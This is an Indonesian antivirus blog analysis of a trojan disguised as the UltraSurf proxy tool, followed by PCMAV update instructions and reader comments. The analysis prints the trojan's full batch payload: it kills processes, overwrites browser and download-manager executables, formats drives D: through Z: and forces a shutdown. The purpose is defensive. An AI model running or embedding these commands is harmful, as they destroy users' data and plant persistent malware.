UltraSurf: Memformat Semua Hard Disk
UltraSurf. Beberapa waktu yang lalu, di forum virusindonesia.com ada salah seorang user yang sengaja mempublikasikan salah satu aplikasi dengan nama UltraSurf. Dengan mengatakan bahwa aplikasi UltraSurf ini dapat mem-bypass proxy dan membuat user bisa mengakses setiap website yang di blok. Sekilas aplikasi ini memang mirip aplikasi UltraSurf yang sebenarnya, tetapi hal buruklah yang akan user alami jika menggunakan aplikasi tipuan ini karena sudah dipastikan user akan kehilangan seluruh data di hard disknya.
A. Info File
Nama Worm : UltraSurf
Asal : Indonesia
Ukuran File : Random
Packer : UPX 0.89 – 3.xx -> Markus & Laszlo ver. [ 3.07 ]
Pemrograman : Delphi
Icon : Random
Tipe : Trojan, Worm
B. About Malware
Variant pertama dari UltraSurf kami dapatkan berasala dari Jakarta. Mungkin hanya buatan orang yang memang berniat untuk menghapus setiap data user yang terdapat pada drive lain selain drive C. Hal ini dimaksudkan agar malware tetap bisa menjalankan aksinya untuk memformat setiap drive setelah di jalankan.
Seperti yang terlihat pada gambar di atas, UltraSurf berasal dari Indonesia. Setelah di UnPack, sangat terlihat tujuan dari UltraSurf setelah dijalankan oleh user.
C. Companion/File yang dibuat
Setelah user menjalankan UltraSurf, malware ini akan membuat 1 buah file dengan nama ultrasurf.bat di folder temporary. Pada variant D, file bat yang dibuat menggunakan nama “alaskan ip.bat”. Batch file ini hanya bersifat sementara yang dibuat setelah UltraSurf di jalankan dan otomatis dihapus setelah selesai mengeksekusi seluruh perintahnya.
D. Hasil Infeksi
Dengan perintah-perintah bat file ini, jelas benar-benar terlihat apa saja yang akan dilakukan oleh UltraSurf.
Menghentikan proses dengan nama idman.exe, firefox.exe, explorer.exe
taskkill /f /im idman.exe
taskkill /f /im firefox.exe
taskkill /f /im explorer.exe
mengcopy file hostnya dan melakukan overwrite ke beberapa file seperti IDMan.exe, firefox.exe, explorer, explorer.exe
xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Internet Download Manager\IDMan.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Mozilla Firefox\firefox.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer.exe"
Memformat semua hard disk mulai dari drive D sampai Z.
echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
Format G: /Q /X /y
echo.
Format H: /Q /X /y
echo.
Format I: /Q /X /y
echo.
Format J: /Q /X /y
echo.
Format K: /Q /X /y
echo.
Format L: /Q /X /y
echo.
Format M: /Q /X /y
echo.
Format N: /Q /X /y
echo.
Format 0: /Q /X /y
echo.
Format P: /Q /X /y
echo.
Format Q: /Q /X /y
echo.
Format R: /Q /X /y
echo.
Format S: /Q /X /y
echo.
Format T: /Q /X /y
echo.
Format U: /Q /X /y
echo.
Format V: /Q /X /y
echo.
Format W: /Q /X /y
echo.
Format X: /Q /X /y
echo.
Format Y: /Q /X /y
echo.
Format Z: /Q /X /y
Dan yang terakhir adalah melakukan proses shuting down
start shutdown.exe -f -t 0 –s
Meskipun tidak membuat host untuk dijadikan startup, UltraSurf memanfaatkan user yang tidak tidak tahu bahwa file firefox.exe sudah di hapus dan digantikan dengan host UltraSurf. Selain itu IDMan.exe adalah salah satu file dari software Internet Download Manager yang di jalankan saat startup, jadi UltraSurf yang sudah mengganti file IDMan.exe dengan host buatannya akan berjalan saat startup.
E. Pembersihan
PCMAV 5.4 Update Build1
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build1 telah hadir dengan penambahan 29 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
ZippyShare.com (mirror)
RapidShare.com (mirror)
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Daftar tambahan virus hingga PCMAV 5.4 Update Build1:
Fandi.vbs.C
Fandi.vbs.C.inf
NgrBot
NgrBot.bat
NgrBot.dat
NgrBot.drp.A
NgrBot.drp.B
NgrBot.exe.A
NgrBot.exe.B
NgrBot.inf
NgrBot.lnk
Pluto.C
Pluto.C.drp
Pluto.C.htm
Redlof.vbs.B
Redlof.vbs.B.drp
Redlof.vbs.B.inf
RezaTera.B
RezaTera.B.drp
RezaTera.B.url
Rieysha-Jogja.E
Rieysha-Jogja.E.hosts
Rieysha-Jogja.E.vbs
UltraSurf.A
UltraSurf.A.bat
UltraSurf.B
UltraSurf.C
UltraSurf.D
UltraSurf.D.bat
pertamax kah
Makasih Infony kl ga data saya habis..
seyem oi..
mudah2an ga sampe ada yang bunuh diri gara2 hardisknya ke format…
wah bener-bener parah nih yang buat virus, bener apa yang dikata efka “mudah2an ga sampe ada yang bunuh diri gara2 hardisknya ke format…”
makanya jangan tertipu dengan memakai aplikasi yang tidak jelas terutama melihat di blog blog yang kurang dipercaya~ oWo
ini adalah cara kejam, memformat harddisk :/
harddisk yang terformat, itu susah kalau direcover, kalau bisa direcover butuh waktu yang banyak DX
anyway, ukurannya random, ini sekitar berapa KB? (maksudnya kebanyakan berapa KB?)
Klasik banget, bikin kayak batch ginian !!! binering planting ??! Clean to OS pirates….Sedeppp
|[prepair to medium destroys]101010
simply but deadly.
LeBaY….!!! hardisk ke-Format kudu pake acara bunuh diri….. yg ada juga bunuh itu virus dari Komputer !!! and Kasih tau yg laen biar ng’gak kejebak hal yg sama…. ^^,d (soalnya ane sendiri yg dapet ney musibah and dapet ney virus, juga dari link yg ada di Forum) Terimakasih untuk Administrator diForum yg dah respon dengan cepat dan ng’Blok link yg ada, jadi tidak menyebar dan digunakan oleh penghuni Forum yg laen….
Tenaaaang. Suatu saat si pembuat virus di atas akan dapat balasannya. Data2 pentingnya insya Allah akan hilang…tinggal masalah waktu…
hanya batch script doank, dongo banget kalo sampe bisa ketipu
) huahahaha…
@prayitno: sama aja kalee kalau data penting itu sangat penting, ya sama aja dan percuma menghapus virusnya … :p dan KID jangan sombong :p
pcmav 5.4 masih blum sempurna,
2 hari yg lalu di kantor teman sy mengganti AV pakai pcmav, karena di readme textnya, katanya udah fixed untuk file doc.office. ternyata saat pcmav di aktifkan data pimpinan kami yg di simpan di flash disk tidak bisa terbuka sampai-sampai orang dikantor panik, pgawai sbuk membuat filenya kembali, tapi kemarin setelah sy lht PC kantor dan sy exit pcmav datanya baru bisa terbuka.. mohon tim pcmav berkenan merevisi edisi 5.4 dan membuatkan LINK di Website ini… karena kami adalh pelanggan majalah PC media d Kota Palu. karena ini sangat merugikan!
@A.RAHMAN
fitur block program on usb jangan dicentang.
“hanya batch script doank” itu karena “lw” liat penjelasan dari team PCMAV, aslinya file ini executable dan orang ng’gak akan menyangka kalo isinya bukan command batch script… padahal isinya seperti yg terlihat pada penjelasan diatas…
ng’bunuh virus mah kagak ada percumanya neng…. malah harus dan wajib, tapi kalo bisa ya…. upload dulu ke : http://upload.virusindonesia.com/ biar database PCMAV makin komplet dan ampuh… ^^,d
sudah bung, sy sudah coba sarannya tapi tetap sj datanya tidak bisa terbuka
semakin hari virus semakin ganas aja, harus update pcmav terus nih
kayaknya ini pekerjaan phreaker yang suka pake trik gratisan ^^
hahahayyy ada nama mindhack wow
wew.. nama Mindhack dibawa2 wew..
bahaya juga nih buat yang suka berburu gratisan
Amat sangat simple tetapi sangat merugikan,,,, ini pelajaran tuk kita semua agar tidak mengeksekusi file2 exe sembarangan,, mungkin sekarang dia bikin dgn nama software ultrasurf bisa jadi besok2 si pembuat virus membuat virus dgn nama software beken lain nya,,, waspadalah,, waspadalah,,,
Makanya download langsung dari official websitenya
sudah update pcmav – buat jaga2
pegang 2 komputer, win xp dan win 7
selain itu plugin clamav juga ikut di update
kenapa yah beberapa aplikasi di win xp gak mau jalan kalo pcmav aktif di win xp? yang cukup parah ngambek adalah ‘Mobile Partner’ buat modem USB
xp sp 3 yang saya gunakan
@yooke
coba liat jawabannya di _http://virusindonesia.com/forum/viewtopic.php?pid=14214#p14214
saya pake pcmav 5.3, gimana caranya update keyang baru..saya coba dari traynya tetapi salau muncul no update found,gimana ni mas mas, tolongin dong
saya sudah download PCMAV 5.4 Valhalla dan update-nya, tapi kenapa setiap saya jalankan di komputer saya, komputer saya jadi sering nge-hang.
Padahal sebelumnya saya pake yang 5.0 – 5.3 ga apa-apa, malah bagus.
Apa ada yang salah pd komputer saya, ato gmn nih ?
Saya jadi pake versi yang 5.3 aja sekarang…..
Tolong dong kasih penjelasan knp bisa begini ???
@Ferry Wibisana: silahkan buka _virusindonesia.com/forum/viewtopic.php?id=1078_
valueable information
Jiah mau2 aja di kibulin..
mantap gan artikelnya. sangat membantu sekali buat para newbie kayak gini, terima kasih.